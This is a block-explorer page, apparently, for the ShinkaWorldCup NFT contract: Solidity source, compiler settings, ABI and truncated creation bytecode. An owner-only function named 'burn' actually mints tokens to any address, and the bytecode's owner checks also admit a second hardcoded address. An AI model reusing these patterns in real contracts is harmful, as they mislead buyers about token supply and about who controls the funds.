function copyEntriesOf(address registrant, address registrantToCopy) external; function isOperatorFiltered(address registrant, address operator) external returns (bool); function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool); function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool); function filteredOperators(address addr) external returns (address[] memory); function filteredCodeHashes(address addr) external returns (bytes32[] memory); function filteredOperatorAt(address registrant, uint256 index) external returns (address); function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32); function isRegistered(address addr) external returns (bool); function codeHashOf(address addr) external returns (bytes32); } abstract contract OperatorFilterer { error OperatorNotAllowed(address operator); IOperatorFilterRegistry constant OPERATOR_FILTER_REGISTRY = IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E); constructor(address subscriptionOrRegistrantToCopy, bool subscribe) { // If an inheriting token contract is deployed to a network without the registry deployed, the modifier // will not revert, but the contract will need to be registered with the registry once it is deployed in // order for the modifier to filter addresses. if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) { if (subscribe) { OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy); } else { if (subscriptionOrRegistrantToCopy != address(0)) { OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy); } else { OPERATOR_FILTER_REGISTRY.register(address(this)); } } } } modifier onlyAllowedOperator(address from) virtual { // Check registry code length to facilitate testing in environments without a deployed registry. if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) { // Allow spending tokens from addresses with balance // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred // from an EOA. if (from == msg.sender) { _; return; } if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) { revert OperatorNotAllowed(msg.sender); } } _; } modifier onlyAllowedOperatorApproval(address operator) virtual { // Check registry code length to facilitate testing in environments without a deployed registry. if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) { if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) { revert OperatorNotAllowed(operator); } } _; } } abstract contract DefaultOperatorFilterer is OperatorFilterer { address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6); constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {} } contract ShinkaWorldCup is ERC721A, Ownable, DefaultOperatorFilterer, ReentrancyGuard { string public baseURI = "ipfs://bafybeidfyjvda6miypojndimqy2svgk7rez3l2jyllx3zudjlamq663woa/"; uint public price = 0.0079 ether; uint public maxPerTx = 10; uint public maxPerFree = 1; uint public maxPerWallet = 10; uint public totalFree = 10000; uint public maxSupply = 10000; bool public mintEnabled; uint public totalFreeMinted = 0; mapping(address => uint256) public _mintedFreeAmount; mapping(address => uint256) public _totalMintedAmount; constructor() ERC721A("ShinkaWorldCup", "SWC"){} function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) { require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token"); string memory currentBaseURI = _baseURI(); return bytes(currentBaseURI).length > 0 ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json")) : ""; } function _startTokenId() internal view virtual returns (uint256) { return 1; } function mint(uint256 count) external payable { uint256 cost = price; bool isFree = ((totalFreeMinted + count < totalFree + 1) && (_mintedFreeAmount[msg.sender] < maxPerFree)); if (isFree) { require(mintEnabled, "Mint is not live yet"); require(totalSupply() + count <= maxSupply, "No more"); require(count <= maxPerTx, "Max per TX reached."); if(count >= (maxPerFree - _mintedFreeAmount[msg.sender])) { require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "Please send the exact ETH amount"); _mintedFreeAmount[msg.sender] = maxPerFree; totalFreeMinted += maxPerFree; } else if(count < (maxPerFree - _mintedFreeAmount[msg.sender])) { require(msg.value >= 0, "Please send the exact ETH amount"); _mintedFreeAmount[msg.sender] += count; totalFreeMinted += count; } } else{ require(mintEnabled, "Mint is not live yet"); require(_totalMintedAmount[msg.sender] + count <= maxPerWallet, "Exceed maximum NFTs per wallet"); require(msg.value >= count * cost, "Please send the exact ETH amount"); require(totalSupply() + count <= maxSupply, "No more"); require(count <= maxPerTx, "Max per TX reached."); require(msg.sender == tx.origin, "The minter is another contract"); } _totalMintedAmount[msg.sender] += count; _safeMint(msg.sender, count); } function costCheck() public view returns (uint256) { return price; } function maxFreePerWallet() public view returns (uint256) { return maxPerFree; } function burn(address mintAddress, uint256 count) public onlyOwner { _safeMint(mintAddress, count); } function _baseURI() internal view virtual override returns (string memory) { return baseURI; } function setBaseUri(string memory baseuri_) public onlyOwner { baseURI = baseuri_; } function setPrice(uint256 price_) external onlyOwner { price = price_; } function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner { totalFree = MaxTotalFree_; } function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner { maxPerFree = MaxPerFree_; } function toggleMinting() external onlyOwner { mintEnabled = !mintEnabled; } function CommunityWallet(uint quantity, address user) public onlyOwner { require( quantity > 0, "Invalid mint amount" ); require( totalSupply() + quantity <= maxSupply, "Maximum supply exceeded" ); _safeMint(user, quantity); } function withdraw() external onlyOwner nonReentrant { (bool success, ) = msg.sender.call{value: address(this).balance}(""); require(success, "Transfer failed."); } // opensea new update function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) { super.setApprovalForAll(operator, approved); } function approve(address operator, uint256 tokenId) public override onlyAllowedOperatorApproval(operator) { super.approve(operator, tokenId); } function transferFrom(address from, address to, uint256 tokenId) public override onlyAllowedOperator(from) { super.transferFrom(from, to, tokenId); } function safeTransferFrom(address from, address to, uint256 tokenId) public override onlyAllowedOperator(from) { super.safeTransferFrom(from, to, tokenId); } function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data) public override onlyAllowedOperator(from) { super.safeTransferFrom(from, to, tokenId, data); } }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"address","name":"user","type":"address"}],"name":"CommunityWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_totalMintedAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405273cd2eac4c9e1089ec8fb24eaf44cb6caa7dec2090600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550604051806080016040528060438152602001620062a860439139600a9081620000839190620006d3565b50661c110215b9c000600b55600a600c556001600d55600a600e55612710600f556127106010556000601255348015620000bc57600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280600e81526020017f5368696e6b61576f726c644375700000000000000000000000000000000000008152506040518060400160405280600381526020017f53574300000000000000000000000000000000000000000000000000000000008152508160019081620001519190620006d3565b508060029081620001639190620006d3565b505050620001866200017a6200038b60201b60201c565b6200039360201b60201c565b60006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156200037b57801562000241576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b815260040162000207929190620007ff565b600060405180830381600087803b1580156200022257600080fd5b505af115801562000237573d6000803e3d6000fd5b505050506200037a565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614620002fb576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b8152600401620002c1929190620007ff565b600060405180830381600087803b158015620002dc57600080fd5b505af1158015620002f1573d6000803e3d6000fd5b5050505062000379565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b81526004016200034491906200082c565b600060405180830381600087803b1580156200035f57600080fd5b505af115801562000374573d6000803e3d6000fd5b505050505b5b5b5050600160098190555062000849565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620004db57607f821691505b602082108103620004f157620004f062000493565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200055b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200051c565b6200056786836200051c565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005b4620005ae620005a8846200057f565b62000589565b6200057f565b9050919050565b6000819050919050565b620005d08362000593565b620005e8620005df82620005bb565b84845462000529565b825550505050565b600090565b620005ff620005f0565b6200060c818484620005c5565b505050565b5b81811015620006345762000628600082620005f5565b60018101905062000612565b5050565b601f82111562000683576200064d81620004f7565b62000658846200050c565b8101602085101562000668578190505b6200068062000677856200050c565b83018262000611565b50505b505050565b600082821c905092915050565b6000620006a86000198460080262000688565b1980831691505092915050565b6000620006c3838362000695565b9150826002028217905092915050565b620006de8262000459565b67ffffffffffffffff811115620006fa57620006f962000464565b5b620007068254620004c2565b6200071382828562000638565b600060209050601f8311600181146200074b576000841562000736578287015190505b620007428582620006b5565b865550620007b2565b601f1984166200075b86620004f7565b60005b8281101562000785578489015182556001820191506020850194506020810190506200075e565b86831015620007a55784890151620007a1601f89168262000695565b8355505b6001600288020188555050505b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620007e782620007ba565b9050919050565b620007f981620007da565b82525050565b6000604082019050620008166000830185620007ee565b620008256020830184620007ee565b9392505050565b6000602082019050620008436000830184620007ee565b92915050565b615a4f80620008596000396000f3fe6080604052600436106102465760003560e01c80638da5cb5b11610139578063b88d4fde116100b6578063dad7b5c91161007a578063dad7b5c91461085d578063e945971c14610888578063e985e9c5146108b1578063f2fde38b146108ee578063f4db2acb14610917578063f968adbe1461095457610246565b8063b88d4fde14610776578063c7c39ffc1461079f578063c87b56dd146107ca578063d123973014610807578063d5abeb011461083257610246565b8063a0712d68116100fd578063a0712d68146106b4578063a0bcfc7f146106d0578063a22cb465146106f9578063a702735714610722578063b0e77f421461074d57610246565b80638da5cb5b146105e157806391b7f5ed1461060c57806395d89b41146106355780639dc29fac14610660578063a035b1fe1461068957610246565b806342842e0e116101c757806364b721881161018b57806364b72188146105205780636c0360eb1461054b57806370a0823114610576578063715018a6146105b35780637d55094d146105ca57610246565b806342842e0e14610429578063453c2310146104525780634f6ccce71461047d5780635a963f1b146104ba5780636352211e146104e357610246565b806318160ddd1161020e57806318160ddd1461035657806323b872dd146103815780632f745c59146103aa578063333e44e6146103e75780633ccfd60b1461041257610246565b806301ffc9a71461024b57806306fdde0314610288578063081812fc146102b3578063095ea7b3146102f057806311b01a3214610319575b600080fd5b34801561025757600080fd5b50610272600480360381019061026d9190613dd5565b61097f565b60405161027f9190613e1d565b60405180910390f35b34801561029457600080fd5b5061029d610ac9565b6040516102aa9190613ec8565b60405180910390f35b3480156102bf57600080fd5b506102da60048036038101906102d59190613f20565b610b5b565b6040516102e79190613f8e565b60405180910390f35b3480156102fc57600080fd5b5061031760048036038101906103129190613fd5565b610be0565b005b34801561032557600080fd5b50610340600480360381019061033b9190614015565b610cea565b60405161034d9190614051565b60405180910390f35b34801561036257600080fd5b5061036b610d02565b6040516103789190614051565b60405180910390f35b34801561038d57600080fd5b506103a860048036038101906103a3919061406c565b610d0b565b005b3480156103b657600080fd5b506103d160048036038101906103cc9190613fd5565b610e5b565b6040516103de9190614051565b60405180910390f35b3480156103f357600080fd5b506103fc61104b565b6040516104099190614051565b60405180910390f35b34801561041e57600080fd5b50610427611051565b005b34801561043557600080fd5b50610450600480360381019061044b919061406c565b611230565b005b34801561045e57600080fd5b50610467611380565b6040516104749190614051565b60405180910390f35b34801561048957600080fd5b506104a4600480360381019061049f9190613f20565b611386565b6040516104b19190614051565b60405180910390f35b3480156104c657600080fd5b506104e160048036038101906104dc9190613f20565b6113d9565b005b3480156104ef57600080fd5b5061050a60048036038101906105059190613f20565b6114be565b6040516105179190613f8e565b60405180910390f35b34801561052c57600080fd5b506105356114d4565b6040516105429190614051565b60405180910390f35b34801561055757600080fd5b506105606114de565b60405161056d9190613ec8565b60405180910390f35b34801561058257600080fd5b5061059d60048036038101906105989190614015565b61156c565b6040516105aa9190614051565b60405180910390f35b3480156105bf57600080fd5b506105c8611654565b005b3480156105d657600080fd5b506105df61173b565b005b3480156105ed57600080fd5b506105f6611842565b6040516106039190613f8e565b60405180910390f35b34801561061857600080fd5b50610633600480360381019061062e9190613f20565b61186c565b005b34801561064157600080fd5b5061064a611951565b6040516106579190613ec8565b60405180910390f35b34801561066c57600080fd5b5061068760048036038101906106829190613fd5565b6119e3565b005b34801561069557600080fd5b5061069e611acc565b6040516106ab9190614051565b60405180910390f35b6106ce60048036038101906106c99190613f20565b611ad2565b005b3480156106dc57600080fd5b506106f760048036038101906106f291906141f4565b61214b565b005b34801561070557600080fd5b50610720600480360381019061071b9190614269565b612239565b005b34801561072e57600080fd5b50610737612343565b6040516107449190614051565b60405180910390f35b34801561075957600080fd5b50610774600480360381019061076f91906142a9565b61234d565b005b34801561078257600080fd5b5061079d6004803603810190610798919061438a565b6124d0565b005b3480156107ab57600080fd5b506107b4612623565b6040516107c19190614051565b60405180910390f35b3480156107d657600080fd5b506107f160048036038101906107ec9190613f20565b612629565b6040516107fe9190613ec8565b60405180910390f35b34801561081357600080fd5b5061081c6126dc565b6040516108299190613e1d565b60405180910390f35b34801561083e57600080fd5b506108476126ef565b6040516108549190614051565b60405180910390f35b34801561086957600080fd5b506108726126f5565b60405161087f9190614051565b60405180910390f35b34801561089457600080fd5b506108af60048036038101906108aa9190613f20565b6126fb565b005b3480156108bd57600080fd5b506108d860048036038101906108d3919061440d565b6127e0565b6040516108e59190613e1d565b60405180910390f35b3480156108fa57600080fd5b5061091560048036038101906109109190614015565b612874565b005b34801561092357600080fd5b5061093e60048036038101906109399190614015565b6129ca565b60405161094b9190614051565b60405180910390f35b34801561096057600080fd5b506109696129e2565b6040516109769190614051565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610a4a57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ab257507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ac25750610ac1826129e8565b5b9050919050565b606060018054610ad89061447c565b80601f0160208091040260200160405190810160405280929190818152602001828054610b049061447c565b8015610b515780601f10610b2657610100808354040283529160200191610b51565b820191906000526020600020905b815481529060010190602001808311610b3457829003601f168201915b5050505050905090565b6000610b6682612a52565b610ba5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9c9061451f565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610cdb576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610c5892919061453f565b602060405180830381865afa158015610c75573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c99919061457d565b610cda57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610cd19190613f8e565b60405180910390fd5b5b610ce58383612a5f565b505050565b60146020528060005260406000206000915090505481565b60008054905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610e49573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d7d57610d78848484612b77565b610e55565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610dc692919061453f565b602060405180830381865afa158015610de3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e07919061457d565b610e4857336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610e3f9190613f8e565b60405180910390fd5b5b610e54848484612b77565b5b50505050565b6000610e668361156c565b8210610ea7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9e9061461c565b60405180910390fd5b6000610eb1610d02565b905060008060005b83811015611009576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610fab57806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ffb57868403610ff2578195505050505050611045565b83806001019450505b508080600101915050610eb9565b506040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103c906146ae565b60405180910390fd5b92915050565b600f5481565b611059612b87565b73ffffffffffffffffffffffffffffffffffffffff16611077611842565b73ffffffffffffffffffffffffffffffffffffffff1614806110ed575061109c612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61112c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111239061471a565b60405180910390fd5b600260095403611171576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116890614786565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161119f906147d7565b60006040518083038185875af1925050503d80600081146111dc576040519150601f19603f3d011682016040523d82523d6000602084013e6111e1565b606091505b5050905080611225576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121c90614838565b60405180910390fd5b506001600981905550565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561136e573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036112a25761129d848484612b8f565b61137a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016112eb92919061453f565b602060405180830381865afa158015611308573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061132c919061457d565b61136d57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016113649190613f8e565b60405180910390fd5b5b611379848484612b8f565b5b50505050565b600e5481565b6000611390610d02565b82106113d1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c8906148ca565b60405180910390fd5b819050919050565b6113e1612b87565b73ffffffffffffffffffffffffffffffffffffffff166113ff611842565b73ffffffffffffffffffffffffffffffffffffffff1614806114755750611424612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6114b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114ab9061471a565b60405180910390fd5b80600f8190555050565b60006114c982612baf565b600001519050919050565b6000600b54905090565b600a80546114eb9061447c565b80601f01602080910402602001604051908101604052809291908181526020018280546115179061447c565b80156115645780601f1061153957610100808354040283529160200191611564565b820191906000526020600020905b81548152906001019060200180831161154757829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115dc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115d39061495c565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b61165c612b87565b73ffffffffffffffffffffffffffffffffffffffff1661167a611842565b73ffffffffffffffffffffffffffffffffffffffff1614806116f0575061169f612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61172f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117269061471a565b60405180910390fd5b6117396000612d49565b565b611743612b87565b73ffffffffffffffffffffffffffffffffffffffff16611761611842565b73ffffffffffffffffffffffffffffffffffffffff1614806117d75750611786612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611816576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161180d9061471a565b60405180910390fd5b601160009054906101000a900460ff1615601160006101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b611874612b87565b73ffffffffffffffffffffffffffffffffffffffff16611892611842565b73ffffffffffffffffffffffffffffffffffffffff16148061190857506118b7612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611947576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193e9061471a565b60405180910390fd5b80600b8190555050565b6060600280546119609061447c565b80601f016020809104026020016040519081016040528092919081815260200182805461198c9061447c565b80156119d95780601f106119ae576101008083540402835291602001916119d9565b820191906000526020600020905b8154815290600101906020018083116119bc57829003601f168201915b5050505050905090565b6119eb612b87565b73ffffffffffffffffffffffffffffffffffffffff16611a09611842565b73ffffffffffffffffffffffffffffffffffffffff161480611a7f5750611a2e612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611abe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab59061471a565b60405180910390fd5b611ac88282612e0f565b5050565b600b5481565b6000600b54905060006001600f54611aea91906149ab565b83601254611af891906149ab565b108015611b455750600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611e